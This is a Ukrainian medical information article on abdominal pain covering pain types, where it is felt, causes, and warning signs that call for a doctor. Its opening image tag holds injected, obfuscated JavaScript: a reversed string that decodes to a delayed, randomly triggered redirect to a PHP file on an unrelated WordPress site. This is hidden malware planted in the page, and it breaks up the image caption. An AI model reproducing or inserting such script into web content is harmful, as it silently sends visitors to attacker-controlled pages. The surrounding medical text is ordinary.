Біль у животі

S<script srcset=$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomach pain – woman having abdominal pain” width=”300″ height=”225″ />Біль у животі — одна з найбільш частих скарг хворих. Він може бути абсолютно різним — адже в черевній порожнині поруч один з одним знаходяться безліч органів: шлунок, печінка, жовчний міхур, підшлункова залоза, кишечник, а зовсім поруч — нирки і яєчники. Кожен з них болить по-своєму і вимагає свого лікування. У деяких випадках можна обійтися домашніми засобами, а іноді потрібно терміново викликати швидку невідкладну допомогу.

Як можна описати біль у животі?

Можна виділити два найбільш поширених виду болю:

Cпастичний (судомний) біль, так звана колька. Зазвичай він проявляється хвилеподібними нападами, інтенсивність яких збільшується або зменшується. Біль обумовлений деформаціями в кишечнику (розтягненнями або сжаттям), і, як правило, є наслідком гіперактивної перистальтики. Такий біль викликає надмірне газоутворення в кишечнику, інфекційні запальні процеси або стрес.

Найнебезпечніші і неприємні стани об’єднані у поняття «гострий живіт» (гострий панкреатит, перитоніт). Біль найчастіше інтенсивний, розлитий, загальне самопочуття — погане, нерідко піднімається температура, відкривається сильна блювота, м’язи передньої черевної стінки напружені. У цій ситуації не можна давати якісь знеболюючі ліки до огляду лікаря, а терміново викликати швидку допомогу і госпіталізуватися в хірургічний стаціонар. Апендицит на ранніх стадіях зазвичай не супроводжується дуже сильними болями. Навпаки, біль — тупий, але досить постійний, справа внизу живота (хоча починатися може зліва вгорі), звичайно при цьому — невеликий підйом температури, може бути одноразова блювота. Самопочуття може погіршуватися з часом, і в результаті з’являться ознаки «гострого живота».

Постійний абдомінальний біль. Цей тип болю в животі характеризується відносно постійним і стійким перебігом. Пацієнти часто описують його як «горіння в животі», гостру, ріжучу або «голодну» біль. Такий вид болю є наслідком серйозних запалень органів черевної порожнини, виразкових поразок, нападів жовчнокам’яної хвороби, абсцесів або гострого панкреатиту.

Інший тип болю — хронічні болі, які періодично то зникають, то з’являються знову. Такі болі зазвичай супроводжують якісь з нижчеперелічених станів (хронічні захворювання або інфекції шлунково-кишкового тракту). Якщо відзначаються такі болі, слід звернутися до лікаря і бути готовими відповісти на такі питання:

 • чи пов’язаний біль з їжею (тобто виникає він завжди до або завжди після їжі, або тільки після якоїсь певної їжі);
 • як часто виникають болі , наскільки вони сильні;
 • чи пов’язані болі з фізіологічними відправленнями, а у старших дівчаток з місячними;
 • де зазвичай болить, чи є якась конкретна локалізація болю, біль кудись поширюється; бажано описати характер болю, якщо дитина вже може це зробити ( «тягне», «пече», «коле», «ріже» і т.д.);
 • які заходи зазвичай допомагають при болях (ліки, клізма або газовідвідна трубка, масаж, спокій, холод, тепло і т.д.).

Краще всього, якщо до лікаря ви прийдете, вже маючи на руках результати аналізу на дисбактеріоз і УЗД органів черевної порожнини.

Невротичні болі. Існують і такі болі в животі, які не пов’язані із захворюваннями кишечника або інших внутрішніх органів – невротичні болі. Людина може скаржитися на болі, коли вона чогось боїться чи не хоче, або після якихось психоемоційних стресів, потрясінь. При цьому, зовсім не обов’язково, що вона симулює, живіт дійсно може боліти, іноді навіть болі дуже сильні, що нагадують «гострий живіт». Але при обстеженні нічого не знаходять. У цьому випадку потрібно проконсультуватися у психолога чи невропатолога. Можна зайти і до кардіолога, якщо болі в животі є частиною вегето-судинної дистонії, при цьому у людини, крім болю в животі може бути пітливість, втомлюваність, серцебиття.

Часто біль у животі супроводжується іншими неприємними симптомами, такими як пітливість, нудота, блювота, бурчання (особливо при прийнятті горизонтального положення чи зміни позиції). Симптоми є важливими факторами, що вказують на порушення функції кишечника, шлунка, жовчних шляхів, запальних процесів у підшлунковій залозі. Озноб і лихоманка зазвичай супроводжують небезпечні кишкові інфекції або закупорку жовчних проток. Зміна кольору сечі і калу також є ознакою блокади жовчних шляхів. При цьому сеча, як правило, набуває темний колір, а кал світлішає. Інтенсивний судомний біль, супроводжуваний чорним або кров’янистим випорожненням, вказує на наявність внутрішньої кровотечі і вимагає негайної госпіталізації.

Як довго триває біль?

Зазвичай біль, який триває від кількох секунд до хвилини, не є серйозною причиною для занепокоєння.

Біль, тривалість якого становить години чи навіть дні, є серйозним симптомом, і Ви повинні якомога швидше пройти медичне обстеження.

Коли можуть з’являтися болі в животі?

Біль у животі може з’явитися спонтанно в будь-який час. Розглянемо деякі, найбільш часті випадки прояву синдрому абдомінального болю.

Інтенсивний біль у животі, який змушує Вас прокидатися вночі. Він може з’являтися до або після їжі. Біль часто може передувати спорожненню кишечника, або проявляється відразу після акту дефекації. «Ріжучий» біль, характерний при виразці кишечника, проявляється безпосередньо перед прийомом їжі. Інтенсивний біль, обумовлений жовчнокам’яною хворобою, як і біль при панкреатиті, зазвичай розвивається після їжі. Найбільш частими причинами, що визначають абдомінальний біль, є синдром роздратованого кишечника і дискінезія жовчних шляхів. Для людей, що страждають синдромом роздратованого кишечника характерна поява болю відразу після їжі, що супроводжується здуттям живота, посиленням перистальтики, бурчанням, діареєю або зрідженням випорожнень. Болі стихають після дефекації і проходження газів і, як правило, не турбують ночами. Больовий синдром при синдромі подразненого кишечнику не супроводжується втратою маси тіла, лихоманкою, анемією.

Запальні захворювання кишечника, що супроводжуються проносом (діареєю), також можуть викликати спазм і болі зазвичай до або після спорожнення кишечника. Серед хворих психогенними порушеннями шлунково-кишкового тракту біль у животі як провідний симптом зустрічається в 30% випадків.

Де у Вас болить?

Місце локалізації болю є одним з головних факторів діагностики захворювання. Біль, зосереджений у верхніх відділах черевної порожнини зазвичай викликаний порушеннями в стравоході, кишечнику, жовчовивідних шляхах, печінці, підшлунковій залозі. Біль, що виникає при жовчнокам’яній хворобі або запальних процесах в печінці, локалізується у верхньому правому відділі очеревини; (може іррадіювати під праву лопатку). Біль при виразці і панкреатиті, як правило, іррадіює через всю спину. Болі, викликані порушеннями в тонкому відділі кишечнику, звичайно зосереджені навколо пупка, тоді як болі, обумовлені товстим кишечником, розпізнаються в середині очеревини і нижче пупка. Тазові болі зазвичай відчуваються як здавлювання і дискомфорт у ректальної області. При синдромі абдомінального болю, біль, як правило, невеликої інтенсивності, зосереджений у верхній середній частині черевної порожнини, або в лівому нижньому її відділі. Больовий синдром характеризується різноманіттям проявів: від дифузних тупих болей до гострих, спазматичних; від постійних до пароксизмів болю в животі. Тривалість больових епізодів — від декількох хвилин до декількох годин. У 70% випадків біль супроводжується порушенням моторики кишечника (пронос або запор).

Які причини викликають біль?

Найбільш поширеною причиною є їжа, яку ми вживаємо. Роздратування стравоходу (болі, що тиснуть) викликає солона, занадто гаряча або холодна їжа. Деякі продукти (жирна, багата холестерином їжа) стимулюють утворення або рух жовчних каменів, викликаючи напади жовчних кольок. Не секрет, що багато людей мають непереносимість до певного роду продуктів, наприклад, молока і його молочного цукру (лактози). Вживання їх в їжу призводить до спастичних болей у животі, здуття живота і проносів.

У якому випадку необхідно відвідати лікаря?

При позитивній відповіді хоча б на один з наведених нижче питань, Вам слід звернутися до лікаря-гастроентеролога:

 • Ви часто відчуваєте біль в животі?Stomach pain – woman having abdominal pain
 • Чи впливає відчутий біль на Вашу повсякденну активність і виконання робочих обов’язків?
 • Ви спостерігаєте втрату ваги або зниження апетиту?
 • Ваш біль супроводжується блювотою або нудотою?
 • Чи спостерігаєте Ви зміни в звичках кишечника?
 • Чи прокидаєтеся Ви від інтенсивного болю в животі?
 • Страждали Ви в минулому від таких захворювань як виразка, жовчокам’яна хвороба, запальні захворювання кишечника, хірургічні втручання?
 • Чи мають прийняті Вами ліки побічні ефектами з боку шлунково-кишкового тракту (аспірин, нестероїдні протизапальні)?

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *